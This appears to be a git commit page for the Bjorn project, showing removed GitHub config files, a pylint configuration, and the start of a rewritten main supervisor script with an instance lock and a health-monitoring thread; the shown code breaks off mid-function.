6 Commits

Fabien POLLY · eb20b168a6 · 2026-02-18 22:36:10 +01:00
Add RLUtils class for managing RL/AI dashboard endpoints
- Implemented methods for fetching AI stats, training history, and recent experiences.
- Added functionality to set operation mode (MANUAL, AUTO, AI) with appropriate handling.
- Included helper methods for querying the database and sending JSON responses.
- Integrated model metadata extraction for visualization purposes.
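The operation-mode switching described in the commit above can be pictured with a short sketch. Only the class name `RLUtils` and the three modes come from the commit message; the `Mode` enum, method name, and JSON shape below are illustrative assumptions, not the project's actual implementation:

```python
# Hypothetical sketch of the MANUAL/AUTO/AI mode handling named in the
# commit above. Everything except "RLUtils" and the mode names is assumed.
import json
from enum import Enum


class Mode(Enum):
    MANUAL = "manual"
    AUTO = "auto"
    AI = "ai"


class RLUtils:
    def __init__(self):
        self.mode = Mode.MANUAL

    def set_operation_mode(self, requested: str) -> str:
        """Validate the requested mode and return a JSON response body."""
        try:
            self.mode = Mode(requested.lower())
        except ValueError:
            return json.dumps({"ok": False, "error": f"unknown mode: {requested}"})
        return json.dumps({"ok": True, "mode": self.mode.value})
```

Rejecting unknown modes with a structured error body keeps the dashboard endpoint's responses uniformly JSON, which matches the commit's note about "sending JSON responses".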
Fabien POLLY · b8a13cc698 · 2026-01-24 18:06:18 +01:00
wiki test

Fabien POLLY · a78d05a87d · 2025-12-10 16:44:36 +01:00
Readme modified with Architecture link

Fabien POLLY · dec45ab608 · 2025-12-10 16:40:52 +01:00
docs: Add initial architecture documentation for Bjorn Cyberviking.

Fabien POLLY · d3b0b02a0b · 2025-12-10 16:39:59 +01:00
feat: Added ARCHITECTURE.md file

Fabien POLLY · c1729756c0 · 2025-12-10 16:01:03 +01:00
BREAKING CHANGE: Complete refactor of the architecture to prepare the BJORN V2 release: APIs, assets, UI, webapp, logic, attacks, and many new features.

580 changed files with 139087 additions and 12167 deletions

.gitattributes (vendored, 2 lines)

@@ -1,2 +0,0 @@
*.sh text eol=lf
*.py text eol=lf

.github/FUNDING.yml (vendored, 15 lines)

@@ -1,15 +0,0 @@
# These are supported funding model platforms
#github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
#patreon: # Replace with a single Patreon username
#open_collective: # Replace with a single Open Collective username
#ko_fi: # Replace with a single Ko-fi username
#tidelift: # Replace with a single Tidelift platform-name/package-name e.g., npm/babel
#community_bridge: # Replace with a single Community Bridge project-name e.g., cloud-foundry
#liberapay: # Replace with a single Liberapay username
#issuehunt: # Replace with a single IssueHunt username
#lfx_crowdfunding: # Replace with a single LFX Crowdfunding project-name e.g., cloud-foundry
#polar: # Replace with a single Polar username
buy_me_a_coffee: infinition
#thanks_dev: # Replace with a single thanks.dev username
#custom: # Replace with up to 4 custom sponsorship URLs e.g., ['link1', 'link2']


@@ -1,34 +0,0 @@
---
name: Bug report
about: Create a report to help us improve
title: ""
labels: ""
assignees: ""
---
**Describe the bug**
A clear and concise description of what the bug is.
**To Reproduce**
Steps to reproduce the behavior:
1. Go to '...'
2. Click on '....'
3. Scroll down to '....'
4. See error
**Expected behavior**
A clear and concise description of what you expected to happen.
**Screenshots**
If applicable, add screenshots to help explain your problem.
**Hardware (please complete the following information):**
- Device: [e.g. iPhone6]
- OS: [e.g. iOS]
- Browser [e.g. chrome, safari]
- Version [e.g. 22]
**Additional context**
Add any other context about the problem here.

.github/ISSUE_TEMPLATE/config.yml

@@ -1,11 +0,0 @@
---
# .github/ISSUE_TEMPLATE/config.yml
blank_issues_enabled: false
contact_links:
- name: Bjorn Community Support
url: https://github.com/infinition/bjorn/discussions
about: Please ask and answer questions here.
- name: Bjorn Security Reports
url: https://infinition.github.io/bjorn/SECURITY
about: Please report security vulnerabilities here.


@@ -1,19 +0,0 @@
---
name: Feature request
about: Suggest an idea for this project
title: ""
labels: ""
assignees: ""
---
**Is your feature request related to a problem? Please describe.**
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
**Describe the solution you'd like**
A clear and concise description of what you want to happen.
**Describe alternatives you've considered**
A clear and concise description of any alternative solutions or features you've considered.
**Additional context**
Add any other context or screenshots about the feature request here.

.github/dependabot.yml

@@ -1,12 +0,0 @@
# .github/dependabot.yml
version: 2
updates:
- package-ecosystem: "pip"
directory: "."
schedule:
interval: "weekly"
commit-message:
prefix: "fix(deps)"
open-pull-requests-limit: 5
target-branch: "dev"

.gitignore (vendored, 137 lines)

@@ -1,137 +0,0 @@
# Node.js / npm
node_modules/
npm-debug.log*
yarn-debug.log*
yarn-error.log*
.pnpm-debug.log*
package-lock.json*
# TypeScript / TSX
dist/
*.tsbuildinfo
# Poetry
poetry.lock
# Environment variables
.env
.env.*.local
# Logs
logs
*.log
pnpm-debug.log*
lerna-debug.log*
# Dependency directories
jspm_packages/
# Optional npm cache directory
.npm
# Output of 'npm pack'
*.tgz
# Lockfiles
yarn.lock
.pnpm-lock.yaml
# Optional eslint cache
.eslintcache
# Optional stylelint cache
.stylelintcache
# Optional REPL history
.node_repl_history
# Coverage directory used by tools like istanbul/jest
coverage/
# Output of 'tsc' command
out/
build/
tmp/
temp/
# Python
__pycache__/
*.py[cod]
*.so
*.egg
*.egg-info/
pip-wheel-metadata/
*.pyo
*.pyd
*.whl
*.pytest_cache/
.tox/
env/
venv
venv/
ENV/
env.bak/
.venv/
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Coverage reports
htmlcov/
.coverage
.cache
nosetests.xml
coverage.xml
*.cover
*.py,cover
# Jupyter Notebook
.ipynb_checkpoints
# Django stuff:
staticfiles/
local_settings.py
db.sqlite3
db.sqlite3-journal
# Flask stuff:
instance/
.webassets-cache
# VS Code settings
.vscode/
.idea/
# macOS files
.DS_Store
.AppleDouble
.LSOverride
# Windows files
Thumbs.db
ehthumbs.db
Desktop.ini
$RECYCLE.BIN/
# Linux system files
*.swp
*~
# IDE specific
*.iml
*.suo
*.ntvs*
*.njsproj
*.sln
*.sw?
scripts
*/certs/

.pylintrc (652 lines)

@@ -1,652 +0,0 @@
[MAIN]
# Analyse import fallback blocks. This can be used to support both Python 2 and
# 3 compatible code, which means that the block might have code that exists
# only in one or another interpreter, leading to false positives when analysed.
analyse-fallback-blocks=no
# Clear in-memory caches upon conclusion of linting. Useful if running pylint
# in a server-like mode.
clear-cache-post-run=no
# Load and enable all available extensions. Use --list-extensions to see a list
# all available extensions.
#enable-all-extensions=
# In error mode, messages with a category besides ERROR or FATAL are
# suppressed, and no reports are done by default. Error mode is compatible with
# disabling specific errors.
#errors-only=
# Always return a 0 (non-error) status code, even if lint errors are found.
# This is primarily useful in continuous integration scripts.
#exit-zero=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code.
extension-pkg-allow-list=
# A comma-separated list of package or module names from where C extensions may
# be loaded. Extensions are loading into the active Python interpreter and may
# run arbitrary code. (This is an alternative name to extension-pkg-allow-list
# for backward compatibility.)
extension-pkg-whitelist=
# Return non-zero exit code if any of these messages/categories are detected,
# even if score is above --fail-under value. Syntax same as enable. Messages
# specified are enabled, while categories only check already-enabled messages.
fail-on=
# Specify a score threshold under which the program will exit with error.
fail-under=8
# Interpret the stdin as a python script, whose filename needs to be passed as
# the module_or_package argument.
#from-stdin=
# Files or directories to be skipped. They should be base names, not paths.
ignore=venv,node_modules,scripts
# Add files or directories matching the regular expressions patterns to the
# ignore-list. The regex matches against paths and can be in Posix or Windows
# format. Because '\\' represents the directory delimiter on Windows systems,
# it can't be used as an escape character.
ignore-paths=
# Files or directories matching the regular expression patterns are skipped.
# The regex matches against base names, not paths. The default value ignores
# Emacs file locks
ignore-patterns=^\.#
# List of module names for which member attributes should not be checked and
# will not be imported (useful for modules/projects where namespaces are
# manipulated during runtime and thus existing member attributes cannot be
# deduced by static analysis). It supports qualified module names, as well as
# Unix pattern matching.
ignored-modules=
# Python code to execute, usually for sys.path manipulation such as
# pygtk.require().
#init-hook=
# Use multiple processes to speed up Pylint. Specifying 0 will auto-detect the
# number of processors available to use, and will cap the count on Windows to
# avoid hangs.
jobs=1
# Control the amount of potential inferred values when inferring a single
# object. This can help the performance when dealing with large functions or
# complex, nested conditions.
limit-inference-results=100
# List of plugins (as comma separated values of python module names) to load,
# usually to register additional checkers.
load-plugins=
# Pickle collected data for later comparisons.
persistent=yes
# Resolve imports to .pyi stubs if available. May reduce no-member messages and
# increase not-an-iterable messages.
prefer-stubs=no
# Minimum Python version to use for version dependent checks. Will default to
# the version used to run pylint.
py-version=3.12
# Discover python modules and packages in the file system subtree.
recursive=no
# Add paths to the list of the source roots. Supports globbing patterns. The
# source root is an absolute path or a path relative to the current working
# directory used to determine a package namespace for modules located under the
# source root.
source-roots=
# When enabled, pylint would attempt to guess common misconfiguration and emit
# user-friendly hints instead of false-positive error messages.
suggestion-mode=yes
# Allow loading of arbitrary C extensions. Extensions are imported into the
# active Python interpreter and may run arbitrary code.
unsafe-load-any-extension=no
# In verbose mode, extra non-checker-related info will be displayed.
#verbose=
[BASIC]
# Naming style matching correct argument names.
argument-naming-style=snake_case
# Regular expression matching correct argument names. Overrides argument-
# naming-style. If left empty, argument names will be checked with the set
# naming style.
#argument-rgx=
# Naming style matching correct attribute names.
attr-naming-style=snake_case
# Regular expression matching correct attribute names. Overrides attr-naming-
# style. If left empty, attribute names will be checked with the set naming
# style.
#attr-rgx=
# Bad variable names which should always be refused, separated by a comma.
bad-names=foo,
bar,
baz,
toto,
tutu,
tata
# Bad variable names regexes, separated by a comma. If names match any regex,
# they will always be refused
bad-names-rgxs=
# Naming style matching correct class attribute names.
class-attribute-naming-style=any
# Regular expression matching correct class attribute names. Overrides class-
# attribute-naming-style. If left empty, class attribute names will be checked
# with the set naming style.
#class-attribute-rgx=
# Naming style matching correct class constant names.
class-const-naming-style=UPPER_CASE
# Regular expression matching correct class constant names. Overrides class-
# const-naming-style. If left empty, class constant names will be checked with
# the set naming style.
#class-const-rgx=
# Naming style matching correct class names.
class-naming-style=PascalCase
# Regular expression matching correct class names. Overrides class-naming-
# style. If left empty, class names will be checked with the set naming style.
#class-rgx=
# Naming style matching correct constant names.
const-naming-style=UPPER_CASE
# Regular expression matching correct constant names. Overrides const-naming-
# style. If left empty, constant names will be checked with the set naming
# style.
#const-rgx=
# Minimum line length for functions/classes that require docstrings, shorter
# ones are exempt.
docstring-min-length=-1
# Naming style matching correct function names.
function-naming-style=snake_case
# Regular expression matching correct function names. Overrides function-
# naming-style. If left empty, function names will be checked with the set
# naming style.
#function-rgx=
# Good variable names which should always be accepted, separated by a comma.
good-names=i,
j,
k,
ex,
Run,
_
# Good variable names regexes, separated by a comma. If names match any regex,
# they will always be accepted
good-names-rgxs=
# Include a hint for the correct naming format with invalid-name.
include-naming-hint=no
# Naming style matching correct inline iteration names.
inlinevar-naming-style=any
# Regular expression matching correct inline iteration names. Overrides
# inlinevar-naming-style. If left empty, inline iteration names will be checked
# with the set naming style.
#inlinevar-rgx=
# Naming style matching correct method names.
method-naming-style=snake_case
# Regular expression matching correct method names. Overrides method-naming-
# style. If left empty, method names will be checked with the set naming style.
#method-rgx=
# Naming style matching correct module names.
module-naming-style=snake_case
# Regular expression matching correct module names. Overrides module-naming-
# style. If left empty, module names will be checked with the set naming style.
#module-rgx=
# Colon-delimited sets of names that determine each other's naming style when
# the name regexes allow several styles.
name-group=
# Regular expression which should only match function or class names that do
# not require a docstring.
no-docstring-rgx=^_
# List of decorators that produce properties, such as abc.abstractproperty. Add
# to this list to register other decorators that produce valid properties.
# These decorators are taken in consideration only for invalid-name.
property-classes=abc.abstractproperty
# Regular expression matching correct type alias names. If left empty, type
# alias names will be checked with the set naming style.
#typealias-rgx=
# Regular expression matching correct type variable names. If left empty, type
# variable names will be checked with the set naming style.
#typevar-rgx=
# Naming style matching correct variable names.
variable-naming-style=snake_case
# Regular expression matching correct variable names. Overrides variable-
# naming-style. If left empty, variable names will be checked with the set
# naming style.
variable-rgx=[a-z_][a-z0-9_]{2,30}$
[CLASSES]
# Warn about protected attribute access inside special methods
check-protected-access-in-special-methods=no
# List of method names used to declare (i.e. assign) instance attributes.
defining-attr-methods=__init__,
__new__,
setUp,
asyncSetUp,
__post_init__
# List of member names, which should be excluded from the protected access
# warning.
exclude-protected=_asdict,_fields,_replace,_source,_make,os._exit
# List of valid names for the first argument in a class method.
valid-classmethod-first-arg=cls
# List of valid names for the first argument in a metaclass class method.
valid-metaclass-classmethod-first-arg=mcs
[DESIGN]
# List of regular expressions of class ancestor names to ignore when counting
# public methods (see R0903)
exclude-too-few-public-methods=
# List of qualified class names to ignore when counting class parents (see
# R0901)
ignored-parents=
# Maximum number of arguments for function / method.
max-args=5
# Maximum number of attributes for a class (see R0902).
max-attributes=7
# Maximum number of boolean expressions in an if statement (see R0916).
max-bool-expr=5
# Maximum number of branch for function / method body.
max-branches=12
# Maximum number of locals for function / method body.
max-locals=15
# Maximum number of parents for a class (see R0901).
max-parents=7
# Maximum number of positional arguments for function / method.
max-positional-arguments=5
# Maximum number of public methods for a class (see R0904).
max-public-methods=20
# Maximum number of return / yield for function / method body.
max-returns=6
# Maximum number of statements in function / method body.
max-statements=50
# Minimum number of public methods for a class (see R0903).
min-public-methods=2
[EXCEPTIONS]
# Exceptions that will emit a warning when caught.
overgeneral-exceptions=builtins.BaseException,builtins.Exception
[FORMAT]
# Expected format of line ending, e.g. empty (any line ending), LF or CRLF.
expected-line-ending-format=
# Regexp for a line that is allowed to be longer than the limit.
ignore-long-lines=^\s*(# )?<?https?://\S+>?$
# Number of spaces of indent required inside a hanging or continued line.
indent-after-paren=4
# String used as indentation unit. This is usually " " (4 spaces) or "\t" (1
# tab).
indent-string=' '
# Maximum number of characters on a single line.
max-line-length=100
# Maximum number of lines in a module.
max-module-lines=2500
# Allow the body of a class to be on the same line as the declaration if body
# contains single statement.
single-line-class-stmt=no
# Allow the body of an if to be on the same line as the test if there is no
# else.
single-line-if-stmt=no
[IMPORTS]
# List of modules that can be imported at any level, not just the top level
# one.
allow-any-import-level=
# Allow explicit reexports by alias from a package __init__.
allow-reexport-from-package=no
# Allow wildcard imports from modules that define __all__.
allow-wildcard-with-all=no
# Deprecated modules which should not be used, separated by a comma.
deprecated-modules=
# Output a graph (.gv or any supported image format) of external dependencies
# to the given file (report RP0402 must not be disabled).
ext-import-graph=
# Output a graph (.gv or any supported image format) of all (i.e. internal and
# external) dependencies to the given file (report RP0402 must not be
# disabled).
import-graph=
# Output a graph (.gv or any supported image format) of internal dependencies
# to the given file (report RP0402 must not be disabled).
int-import-graph=
# Force import order to recognize a module as part of the standard
# compatibility libraries.
known-standard-library=
# Force import order to recognize a module as part of a third party library.
known-third-party=enchant
# Couples of modules and preferred modules, separated by a comma.
preferred-modules=
[LOGGING]
# The type of string formatting that logging methods do. `old` means using %
# formatting, `new` is for `{}` formatting.
logging-format-style=new
# Logging modules to check that the string format arguments are in logging
# function parameter format.
logging-modules=logging
[MESSAGES CONTROL]
# Only show warnings with the listed confidence levels. Leave empty to show
# all. Valid levels: HIGH, CONTROL_FLOW, INFERENCE, INFERENCE_FAILURE,
# UNDEFINED.
confidence=HIGH,
CONTROL_FLOW,
INFERENCE,
INFERENCE_FAILURE,
UNDEFINED
# Disable the message, report, category or checker with the given id(s). You
# can either give multiple identifiers separated by comma (,) or put this
# option multiple times (only on the command line, not in the configuration
# file where it should appear only once). You can also use "--disable=all" to
# disable everything first and then re-enable specific checks. For example, if
# you want to run only the similarities checker, you can use "--disable=all
# --enable=similarities". If you want to run only the classes checker, but have
# no Warning level messages displayed, use "--disable=all --enable=classes
# --disable=W".
disable=missing-module-docstring,
invalid-name,
too-few-public-methods,
E1101,
C0115,
duplicate-code,
raise-missing-from,
wrong-import-order,
ungrouped-imports,
reimported,
too-many-locals,
missing-timeout,
broad-exception-caught,
broad-exception-raised,
line-too-long
# Enable the message, report, category or checker with the given id(s). You can
# either give multiple identifier separated by comma (,) or put this option
# multiple time (only on the command line, not in the configuration file where
# it should appear only once). See also the "--disable" option for examples.
#enable=
[METHOD_ARGS]
# List of qualified names (i.e., library.method) which require a timeout
# parameter e.g. 'requests.api.get,requests.api.post'
timeout-methods=requests.api.delete,requests.api.get,requests.api.head,requests.api.options,requests.api.patch,requests.api.post,requests.api.put,requests.api.request
[MISCELLANEOUS]
# List of note tags to take in consideration, separated by a comma.
notes=FIXME,
XXX,
TODO
# Regular expression of note tags to take in consideration.
notes-rgx=
[REFACTORING]
# Maximum number of nested blocks for function / method body
max-nested-blocks=5
# Complete name of functions that never returns. When checking for
# inconsistent-return-statements if a never returning function is called then
# it will be considered as an explicit return statement and no message will be
# printed.
never-returning-functions=sys.exit,argparse.parse_error
# Let 'consider-using-join' be raised when the separator to join on would be
# non-empty (resulting in expected fixes of the type: ``"- " + " -
# ".join(items)``)
suggest-join-with-non-empty-separator=yes
[REPORTS]
# Python expression which should return a score less than or equal to 10. You
# have access to the variables 'fatal', 'error', 'warning', 'refactor',
# 'convention', and 'info' which contain the number of messages in each
# category, as well as 'statement' which is the total number of statements
# analyzed. This score is used by the global evaluation report (RP0004).
evaluation=max(0, 0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10))
# Template used to display messages. This is a python new-style format string
# used to format the message information. See doc for all details.
msg-template=
# Set the output format. Available formats are: text, parseable, colorized,
# json2 (improved json format), json (old json format) and msvs (visual
# studio). You can also give a reporter class, e.g.
# mypackage.mymodule.MyReporterClass.
#output-format=
# Tells whether to display a full report or only the messages.
reports=no
# Activate the evaluation score.
score=yes
[SIMILARITIES]
# Comments are removed from the similarity computation
ignore-comments=yes
# Docstrings are removed from the similarity computation
ignore-docstrings=yes
# Imports are removed from the similarity computation
ignore-imports=yes
# Signatures are removed from the similarity computation
ignore-signatures=yes
# Minimum lines number of a similarity.
min-similarity-lines=4
[SPELLING]
# Limits count of emitted suggestions for spelling mistakes.
max-spelling-suggestions=4
# Spelling dictionary name. No available dictionaries : You need to install
# both the python package and the system dependency for enchant to work.
spelling-dict=
# List of comma separated words that should be considered directives if they
# appear at the beginning of a comment and should not be checked.
spelling-ignore-comment-directives=fmt: on,fmt: off,noqa:,noqa,nosec,isort:skip,mypy:
# List of comma separated words that should not be checked.
spelling-ignore-words=
# A path to a file that contains the private dictionary; one word per line.
spelling-private-dict-file=
# Tells whether to store unknown words to the private dictionary (see the
# --spelling-private-dict-file option) instead of raising a message.
spelling-store-unknown-words=no
[STRING]
# This flag controls whether inconsistent-quotes generates a warning when the
# character used as a quote delimiter is used inconsistently within a module.
check-quote-consistency=no
# This flag controls whether the implicit-str-concat should generate a warning
# on implicit string concatenation in sequences defined over several lines.
check-str-concat-over-line-jumps=no
[TYPECHECK]
# List of decorators that produce context managers, such as
# contextlib.contextmanager. Add to this list to register other decorators that
# produce valid context managers.
contextmanager-decorators=contextlib.contextmanager
# List of members which are set dynamically and missed by pylint inference
# system, and so shouldn't trigger E1101 when accessed. Python regular
# expressions are accepted.
generated-members=
# Tells whether to warn about missing members when the owner of the attribute
# is inferred to be None.
ignore-none=yes
# This flag controls whether pylint should warn about no-member and similar
# checks whenever an opaque object is returned when inferring. The inference
# can return multiple potential results while evaluating a Python object, but
# some branches might not be evaluated, which results in partial inference. In
# that case, it might be useful to still emit no-member and other checks for
# the rest of the inferred objects.
ignore-on-opaque-inference=yes
# List of symbolic message names to ignore for Mixin members.
ignored-checks-for-mixins=no-member,
not-async-context-manager,
not-context-manager,
attribute-defined-outside-init
# List of class names for which member attributes should not be checked (useful
# for classes with dynamically set attributes). This supports the use of
# qualified names.
ignored-classes=optparse.Values,thread._local,_thread._local,argparse.Namespace
# Show a hint with possible names when a member name was not found. The aspect
# of finding the hint is based on edit distance.
missing-member-hint=yes
# The minimum edit distance a name should have in order to be considered a
# similar match for a missing member name.
missing-member-hint-distance=1
# The total number of similar names that should be taken in consideration when
# showing a hint for a missing member.
missing-member-max-choices=1
# Regex pattern to define which classes are considered mixins.
mixin-class-rgx=.*[Mm]ixin
# List of decorators that change the signature of a decorated function.
signature-mutators=
[VARIABLES]
# List of additional names supposed to be defined in builtins. Remember that
# you should avoid defining new builtins when possible.
additional-builtins=
# Tells whether unused global variables should be treated as a violation.
allow-global-unused-variables=yes
# List of names allowed to shadow builtins
allowed-redefined-builtins=
# List of strings which can identify a callback function by name. A callback
# name must start or end with one of those strings.
callbacks=cb_,
_cb
# A regular expression matching the name of dummy variables (i.e. expected to
# not be used).
dummy-variables-rgx=_+$|(_[a-zA-Z0-9_]*[a-zA-Z0-9]+?$)|dummy|^ignored_|^unused_
# Argument names that match this expression will be ignored.
ignored-argument-names=_.*|^ignored_|^unused_
# Tells whether we should check for unused import in __init__ files.
init-import=no
# List of qualified module names which can have objects that can redefine
# builtins.
redefining-builtins-modules=six.moves,past.builtins,future.builtins,builtins,io
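The `evaluation` expression in the [REPORTS] section above can be sanity-checked by hand. For example, with 200 statements, 2 errors, 5 warnings, and no fatal messages, the score is 10 − ((5·2 + 5)/200)·10 = 9.25, which clears the `fail-under=8` threshold set in [MAIN]. A direct transcription of the formula:

```python
# Reproduces the pylint score formula from the [REPORTS] section above.
def pylint_score(fatal, error, warning, refactor, convention, statement):
    return max(
        0,
        0 if fatal else 10.0 - ((float(5 * error + warning + refactor + convention) / statement) * 10),
    )

print(pylint_score(fatal=0, error=2, warning=5, refactor=0, convention=0, statement=200))  # 9.25
```

Note the asymmetry: errors are weighted five times heavier than warnings, refactors, or conventions, and any fatal message pins the score to 0.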

Bjorn.py (677 lines)

@@ -1,158 +1,625 @@
#bjorn.py
# This script defines the main execution flow for the Bjorn application. It initializes and starts
# various components such as network scanning, display, and web server functionalities. The Bjorn
# class manages the primary operations, including initiating network scans and orchestrating tasks.
# The script handles startup delays, checks for Wi-Fi connectivity, and coordinates the execution of
# scanning and orchestrator tasks using semaphores to limit concurrent threads. It also sets up
# signal handlers to ensure a clean exit when the application is terminated.
# Bjorn.py
# Main entry point and supervisor for the Bjorn project
# Manages lifecycle of threads, health monitoring, and crash protection.
# OPTIMIZED FOR PI ZERO 2: Low CPU overhead, aggressive RAM management.
# Functions:
# - handle_exit: handles the termination of the main and display threads.
# - handle_exit_webserver: handles the termination of the web server thread.
# - is_wifi_connected: Checks for Wi-Fi connectivity using the nmcli command.
# The script starts by loading shared data configurations, then initializes and sta
# bjorn.py test
import threading
import signal
import logging
import time
import sys
import os
import signal
import subprocess
from init_shared import shared_data
from display import Display, handle_exit_display
import sys
import threading
import time
import gc
import tracemalloc
import atexit
from comment import Commentaireia
from webapp import web_thread, handle_exit_web
from orchestrator import Orchestrator
from display import Display, handle_exit_display
from init_shared import shared_data
from logger import Logger
from orchestrator import Orchestrator
from runtime_state_updater import RuntimeStateUpdater
from webapp import web_thread
logger = Logger(name="Bjorn.py", level=logging.DEBUG)
_shutdown_lock = threading.Lock()
_shutdown_started = False
_instance_lock_fd = None
_instance_lock_path = "/tmp/bjorn_160226.lock"
try:
    import fcntl
except Exception:
    fcntl = None
def _release_instance_lock():
    global _instance_lock_fd
    if _instance_lock_fd is None:
        return
    try:
        if fcntl is not None:
            try:
                fcntl.flock(_instance_lock_fd.fileno(), fcntl.LOCK_UN)
            except Exception:
                pass
        _instance_lock_fd.close()
    except Exception:
        pass
    _instance_lock_fd = None
def _acquire_instance_lock() -> bool:
    """Ensure only one Bjorn_160226 process can run at once."""
    global _instance_lock_fd
    if _instance_lock_fd is not None:
        return True
    try:
        fd = open(_instance_lock_path, "a+", encoding="utf-8")
    except Exception as exc:
        logger.error(f"Unable to open instance lock file {_instance_lock_path}: {exc}")
        return True
    if fcntl is None:
        _instance_lock_fd = fd
        return True
    try:
        fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
        fd.seek(0)
        fd.truncate()
        fd.write(str(os.getpid()))
        fd.flush()
    except OSError:
        try:
            fd.seek(0)
            owner_pid = fd.read().strip() or "unknown"
        except Exception:
            owner_pid = "unknown"
        logger.critical(f"Another Bjorn instance is already running (pid={owner_pid}).")
        try:
            fd.close()
        except Exception:
            pass
        return False
    _instance_lock_fd = fd
    return True
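The acquisition path above is a standard non-blocking `fcntl.flock` single-instance guard: take `LOCK_EX | LOCK_NB`, write the owner PID into the lock file, and keep the descriptor open for the process lifetime. Reduced to a standalone sketch (the path and function name here are illustrative, not from the source):

```python
# Minimal single-instance lock using the same flock pattern as above.
# The lock is released when the process exits and the descriptor closes.
# Path and function name are illustrative.
import fcntl
import os


def try_lock(path="/tmp/demo_single_instance.lock"):
    fd = open(path, "a+")
    try:
        fcntl.flock(fd.fileno(), fcntl.LOCK_EX | fcntl.LOCK_NB)
    except OSError:
        fd.close()
        return None  # another holder already has the lock
    fd.seek(0)
    fd.truncate()
    fd.write(str(os.getpid()))
    fd.flush()
    return fd  # keep this handle open for the process lifetime
```

Writing the PID into the file is purely diagnostic (it lets the losing process log who owns the lock, as the `owner_pid` read above does); the mutual exclusion comes from the kernel-level flock, not the file contents.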
class HealthMonitor(threading.Thread):
    """Periodic runtime health logger (threads/fd/rss/queue/epd metrics)."""

    def __init__(self, shared_data_, interval_s: int = 60):
        super().__init__(daemon=True, name="HealthMonitor")
        self.shared_data = shared_data_
        self.interval_s = max(10, int(interval_s))
        self._stop_event = threading.Event()
        self._tm_prev_snapshot = None
        self._tm_last_report = 0.0

    def stop(self):
        self._stop_event.set()

    def _fd_count(self) -> int:
        try:
            return len(os.listdir("/proc/self/fd"))
        except Exception:
            return -1

    def _rss_kb(self) -> int:
        try:
            with open("/proc/self/status", "r", encoding="utf-8") as fh:
                for line in fh:
                    if line.startswith("VmRSS:"):
                        parts = line.split()
                        if len(parts) >= 2:
                            return int(parts[1])
        except Exception:
            pass
        return -1

    def _queue_counts(self):
        pending = running = scheduled = -1
        try:
            # Using query_one safe method from database
            row = self.shared_data.db.query_one(
                """
                SELECT
                    SUM(CASE WHEN status='pending' THEN 1 ELSE 0 END) AS pending,
                    SUM(CASE WHEN status='running' THEN 1 ELSE 0 END) AS running,
                    SUM(CASE WHEN status='scheduled' THEN 1 ELSE 0 END) AS scheduled
                FROM action_queue
                """
            )
            if row:
                pending = int(row.get("pending") or 0)
                running = int(row.get("running") or 0)
                scheduled = int(row.get("scheduled") or 0)
        except Exception as exc:
            logger.error_throttled(
                f"Health monitor queue count query failed: {exc}",
                key="health_queue_counts",
                interval_s=120,
            )
        return pending, running, scheduled

    def run(self):
        while not self._stop_event.wait(self.interval_s):
            try:
                threads = threading.enumerate()
                thread_count = len(threads)
                top_threads = ",".join(t.name for t in threads[:8])
                fd_count = self._fd_count()
                rss_kb = self._rss_kb()
                pending, running, scheduled = self._queue_counts()
                # Lock to safely read shared metrics without race conditions
                with self.shared_data.health_lock:
                    display_metrics = dict(getattr(self.shared_data, "display_runtime_metrics", {}) or {})
                epd_enabled = int(display_metrics.get("epd_enabled", 0))
                epd_failures = int(display_metrics.get("failed_updates", 0))
                epd_reinit = int(display_metrics.get("reinit_attempts", 0))
                epd_headless = int(display_metrics.get("headless", 0))
                epd_last_success = display_metrics.get("last_success_epoch", 0)
                logger.info(
                    "health "
                    f"thread_count={thread_count} "
                    f"rss_kb={rss_kb} "
                    f"queue_pending={pending} "
                    f"epd_failures={epd_failures} "
                    f"epd_reinit={epd_reinit} "
                )
                # Optional: tracemalloc report (only if enabled via PYTHONTRACEMALLOC or tracemalloc.start()).
                try:
                    if tracemalloc.is_tracing():
                        now = time.monotonic()
                        tm_interval = float(self.shared_data.config.get("tracemalloc_report_interval_s", 300) or 300)
                        if tm_interval > 0 and (now - self._tm_last_report) >= tm_interval:
                            self._tm_last_report = now
                            top_n = int(self.shared_data.config.get("tracemalloc_top_n", 10) or 10)
                            top_n = max(3, min(top_n, 25))
                            snap = tracemalloc.take_snapshot()
                            if self._tm_prev_snapshot is not None:
                                stats = snap.compare_to(self._tm_prev_snapshot, "lineno")[:top_n]
                                logger.info(f"mem_top (tracemalloc diff, top_n={top_n})")
                                for st in stats:
                                    logger.info(f"mem_top {st}")
                            else:
                                stats = snap.statistics("lineno")[:top_n]
                                logger.info(f"mem_top (tracemalloc, top_n={top_n})")
                                for st in stats:
                                    logger.info(f"mem_top {st}")
                            self._tm_prev_snapshot = snap
                except Exception as exc:
                    logger.error_throttled(
                        f"Health monitor tracemalloc failure: {exc}",
                        key="health_tracemalloc_error",
                        interval_s=300,
                    )
            except Exception as exc:
                logger.error_throttled(
                    f"Health monitor loop failure: {exc}",
                    key="health_loop_error",
                    interval_s=120,
                )
class Bjorn:
"""Main class for Bjorn. Manages the primary operations of the application."""
def __init__(self, shared_data):
self.shared_data = shared_data
"""Main class for Bjorn. Manages orchestration lifecycle."""
def __init__(self, shared_data_):
self.shared_data = shared_data_
self.commentaire_ia = Commentaireia()
self.orchestrator_thread = None
self.orchestrator = None
self.network_connected = False
self.wifi_connected = False
self.previous_network_connected = None
self._orch_lock = threading.Lock()
self._last_net_check = 0 # Throttling for network scan
self._last_orch_stop_attempt = 0.0
def run(self):
"""Main loop for Bjorn. Waits for Wi-Fi connection and starts Orchestrator."""
# Wait for startup delay if configured in shared data
if hasattr(self.shared_data, 'startup_delay') and self.shared_data.startup_delay > 0:
"""Main loop for Bjorn. Waits for network and starts/stops Orchestrator based on mode."""
if hasattr(self.shared_data, "startup_delay") and self.shared_data.startup_delay > 0:
logger.info(f"Waiting for startup delay: {self.shared_data.startup_delay} seconds")
time.sleep(self.shared_data.startup_delay)
# Main loop to keep Bjorn running
backoff_s = 1.0
while not self.shared_data.should_exit:
if not self.shared_data.manual_mode:
self.check_and_start_orchestrator()
time.sleep(10) # Main loop idle waiting
try:
# Manual mode must stop orchestration so the user keeps full control.
if self.shared_data.operation_mode == "MANUAL":
# Avoid spamming stop requests if already stopped.
